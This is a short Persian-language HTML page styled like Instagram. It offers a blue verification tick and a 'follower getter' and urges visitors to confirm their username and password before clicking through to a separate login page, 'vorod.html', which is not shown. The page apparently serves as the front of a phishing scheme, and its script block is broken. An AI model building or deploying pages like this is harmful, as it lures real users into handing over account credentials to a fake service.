<!DOCTYPE html>
<html lang="fa" dir="rtl">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>درخواست تیک آبی اینستاگرام</title>
    <style>
        body {
            font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
            background-color: #fafafa;
            margin: 0;
            padding: 0;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            color: #262626;
			background-color: #0095f6;
			
        }
        
        .container {
            width: 350px;
            background-color: white;
            border: 1px solid #dbdbdb;
            border-radius: 3px;
            padding: 20px 40px;
            text-align: center;
        }
        
        .logo {
            margin: 20px 0;
            width: 175px;
        }
        
        .form-group {
            margin-bottom: 10px;
            text-align: right;
        }
        
        input {
            width: 100%;
            padding: 10px;
            border: 1px solid #dbdbdb;
            border-radius: 3px;
            background-color: #fafafa;
            font-size: 14px;
            box-sizing: border-box;
        }
        
        input:focus {
            border: 1px solid #a8a8a8;
            outline: none;
        }
        
        button {
            width: 100%;
            padding: 8px;
            background-color: #0095f6;
            color: white;
            border: none;
            border-radius: 4px;
            font-weight: bold;
            margin-top: 10px;
            cursor: pointer;
            font-size: 14px;
        }
        
        button:hover {
            background-color: #0077cc;
        }
        
        .footer {
            margin-top: 20px;
            font-size: 12px;
            color: #8e8e8e;
        }
        
        .success {
            color: green;
            display: none;
        }
        
        .error {
            color: red;
            display: none;
        }
    </style>
</head>
<body>
    <div class="container" ; style= box-shadow: align="">
     
       
  
        
        <h2>خوش اومدی به فالوور بگیر اینستاگرام</h2>
		<p>اول باید وارد اکانت اینستاکرام خودت بشی</p>
		<p style="color: #0095f6">نکته : حتما قبلش نام کاربری و رمز خودت رو داخل اینستاگرام کامل امتحان کن که درست باشه</p>
        
        <button id="submit-btn" onClick="window.location.href='vorod.html';">ورود به اکانت اینستاگرام</button>
        
       
        
        
        <div class="footer">
           
        </div>
    </div>

    <script>
        <button onclick=""window.location.href=;">
  </button>

    </script>
</body>
</html>
